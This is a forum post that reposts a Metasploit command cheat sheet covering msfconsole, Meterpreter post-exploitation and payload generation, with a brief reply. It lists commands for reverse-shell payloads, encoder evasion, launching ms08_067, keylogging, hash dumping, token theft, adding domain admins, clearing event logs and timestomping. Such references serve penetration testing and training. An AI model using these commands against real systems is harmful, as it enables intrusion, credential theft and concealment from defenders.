Metasploit Commands

[Nytro]

Metasploit Commands – CLI Index

I was going through the Metasploit The Penetration Tester’s Guide by David Kennedy,Jim O’Gorman, Devon Kearns and Mati Aharoni . Guys I must say it is worth reading .

This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.

MSFconsole Commands:

show exploits

Show all exploits within the Framework.

show payloads

Show all payloads within the Framework.

show auxiliary

Show all auxiliary modules within the Framework.

search name

Search for exploits or modules within the Framework.

info

Load information about a specific exploit or module.

use name

Load an exploit or module (example: use windows/smb/psexec).

LHOST

Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.

RHOST

The remote host or the target.

set function

Set a specific value (for example, LHOST or RHOST).

setg function

Set a specific value globally (for example, LHOST or RHOST).

show options

Show the options available for a module or exploit.

show targets

Show the platforms supported by the exploit.

set target num

Specify a specific target index if you know the OS and service pack.

set payload payload

Specify the payload to use.

show advanced

Show advanced options.

set autorunscript migrate -f

Automatically migrate to a separate process upon exploit completion.

check

Determine whether a target is vulnerable to an attack.

exploit

Execute the module or exploit and attack the target.exploit -j

Run the exploit under the context of the job. (This will run the exploit in the background.)

exploit -z

Do not interact with the session after successful exploitation.

exploit -e encoder

Specify the payload encoder to use (example: exploit –e shikata_ga_nai).

exploit -h

Display help for the exploit command.

sessions -l

List available sessions (used when handling multiple shells).

sessions -l -v

List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.

sessions -s script

Run a specific Meterpreter script on all Meterpreter live sessions.

sessions -K

Kill all live sessions.

sessions -c cmd

Execute a command on all live Meterpreter sessions.

sessions -u sessionID

Upgrade a normal Win32 shell to a Meterpreter console.

db_create name

Create a database to use with database-driven attacks (example: db_create autopwn).

db_connect name

Create and connect to a database for driven attacks (example: db_connect autopwn).

db_n map

Use n map and place results in database. (Normal n map syntax is supported, such as –sT –v –P0.)

db_autopwn -h

Display help for using db_autopwn.

db_autopwn -p -r -e

Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.

db_destroy

Delete the current database.

db_destroy user:password@host:port/database

Delete database using advanced options.

Meterpreter Commands help:

run scriptname

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.

sysinfo

Show the system information on the compromised target.

ls

List the files and folders on the target.

use priv

Load the privilege extension for extended Meterpreter libraries.

ps

Show all running processes and which accounts are associated with each process.

migrate PID

Migrate to the specific process ID (PID is the target process ID gained from the ps command).

use incognito

Load incognito functions. (Used for token stealing and impersonation on a target machine.)

list_tokens -u

List available tokens on the target by user.

list_tokens -g

List available tokens on the target by group.

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target.

steal_token PID

Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.

shell

Drop into an interactive shell with all available tokens.

execute -f cmd.exe -i

Execute cmd.exe and interact with it.

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens.

execute -f cmd.exe -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process.

rev2self

Revert back to the original user you used to compromise the target.

reg command

Interact, create, delete, query, set, and much more in the target’s registry.

setdesktop number

Switch to a different screen based on who is logged in.

screenshot

Take a screenshot of the target’s screen.

upload file

Upload a file to the target.

download file

Download a file from the target.

keyscan_start

Start sniffing keystrokes on the remote target.

keyscan_dump

Dump the remote keys captured on the target.

keyscan_stop

Stop sniffing keystrokes on the remote target.

getprivs

Get as many privileges as possible on the target.

uictl enable keyboard/mouse

Take control of the keyboard and/or mouse.

background

Run your current Meterpreter shell in the background.

hashdump

Dump all hashes on the target.

use sniffer

Load the sniffer module.

sniffer_interfaces

List the available interfaces on the target.

sniffer_dump interfaceID pcapname

Start sniffing on the remote target.

sniffer_start interfaceID packet-buffer

Start sniffing with a specific range for a packet buffer.

sniffer_stats interfaceID

Grab statistical information from the interface you are sniffing.

sniffer_stop interfaceID

Stop the sniffer.

add_user username password -h ip

Add a user on the remote target.

add_group_user "Domain Admins" username -h ip

Add a username to the Domain Administrators group on the remote target.

clearev

Clear the event log on the target machine.

timestomp

Change file attributes, such as creation date (antiforensics measure).

reboot

Reboot the target machine.

MSFpayload Commands:

msfpayload -h

List available payloads.

msfpayload windows/meterpreter/bind_tcp O

List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe

Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on port 443, and then save it as a Windows Portable Executable named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw

Same as above, but export as raw format. This will be used later in msfencode

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c

Same as above but export as C-formatted shellcode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java

Export as %u encoded JavaScript.

MSFencode Commands:

msfencode -h

Display the msfencode help.

msfencode -l

List the available encoders.

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)

Format to display the encoded buffer.

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Create a multi-encoded payload.

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.

MSFcli Commands:

msfcli | grep exploit

Show only exploits.

msfcli | grep exploit/windows

Show only Windows exploits.

 msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E

Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on port 443.

Meterpreter Post Exploitation Commands:

http://pastebin.com/VmTtcz0A

P.S – This Cheat Sheet is borrowed from:Metasploit The Penetration Tester’s Guide

Sursa: http://www.coresec.org/2011/07/28/metasploit-commands-cli-index/

[yo9gjx]

Excelent, uite si o pagina faina Metasploit Unleashed By Offensive Security